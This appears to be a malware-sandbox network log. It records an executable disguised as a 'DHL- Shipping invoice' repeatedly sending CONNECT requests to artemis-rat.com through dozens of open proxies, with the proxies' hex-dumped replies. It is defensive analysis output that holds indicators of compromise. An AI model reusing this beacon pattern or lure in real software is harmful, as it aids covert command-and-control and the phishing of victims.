                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of
                            Mar 12, 2024 08:37:12.770653963 CET270INData Raw: 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72
                            Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at artemis-rat.com Port 44


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            685192.168.2.45212731.43.158.10888886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.561920881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            686192.168.2.45211545.11.95.16560106484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.571822882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            687192.168.2.452141176.98.22.22481816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.574369907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.249764919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.062591076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.359416962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.953815937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.563090086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.250189066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:17.359416962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            688192.168.2.452020102.212.86.5780806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.575694084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            689192.168.2.452045103.4.145.13310806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.579843998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            690192.168.2.452279192.99.169.1984506484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.592681885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.950721979 CET22INHTTP/1.1 502 ERROR


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            691192.168.2.45217572.210.252.13741456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.598263979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            692192.168.2.45217498.162.25.4316546484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.600162029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            693192.168.2.45217698.162.25.2341456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.600555897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            694192.168.2.452078203.222.24.36806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.608036041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.917789936 CET340INHTTP/1.1 400 Bad Request
                            Server: nginx/1.12.2
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html; charset=UTF-8
                            Content-Length: 173
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            695192.168.2.45213889.35.237.18788886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.646472931 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:02.303123951 CET75INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Length: 0
                            Mar 12, 2024 08:37:03.287832975 CET103INHTTP/1.1 400 Bad Request
                            Content-Type: text/plain; charset=utf-8
                            Connection: close
                            Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                            Data Ascii: 400 Bad Request


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            696192.168.2.452178185.103.101.39100516484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.646678925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:29.379544020 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            697192.168.2.452232192.154.244.9290006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.646744967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            698192.168.2.45217094.177.106.17823246484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.646791935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            699192.168.2.45146272.195.34.5841456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.646892071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            700192.168.2.452065202.162.219.1010806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.646895885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            701192.168.2.452336173.245.49.27806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.647465944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.735775948 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            702192.168.2.451203196.216.11.13546736484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.648912907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            703192.168.2.452101103.153.154.6806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.649368048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.975970984 CET343INHTTP/1.1 400 Bad Request
                            Server: nginx/1.14.0 (Ubuntu)
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 182
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            704192.168.2.4508745.190.220.23531286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.650624037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            705192.168.2.452049175.183.82.22181976484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.651731014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            706192.168.2.45146949.12.126.53571446484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.652409077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            707192.168.2.451759111.59.4.8890026484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.652868032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            708192.168.2.450067176.31.110.126455176484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.653059959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            709192.168.2.452172190.114.253.21033896484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.653076887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            710192.168.2.45222098.162.25.29316796484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.654366970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            711192.168.2.45214791.134.140.160328966484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.654531956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.249933958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            712192.168.2.452368104.21.194.19806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.655683994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.744240999 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            713192.168.2.452168147.75.92.244806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.660034895 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:01.930305004 CET65INHTTP/1.1 200 Connection Established
                            Proxy-Agent: Zscaler/6.3
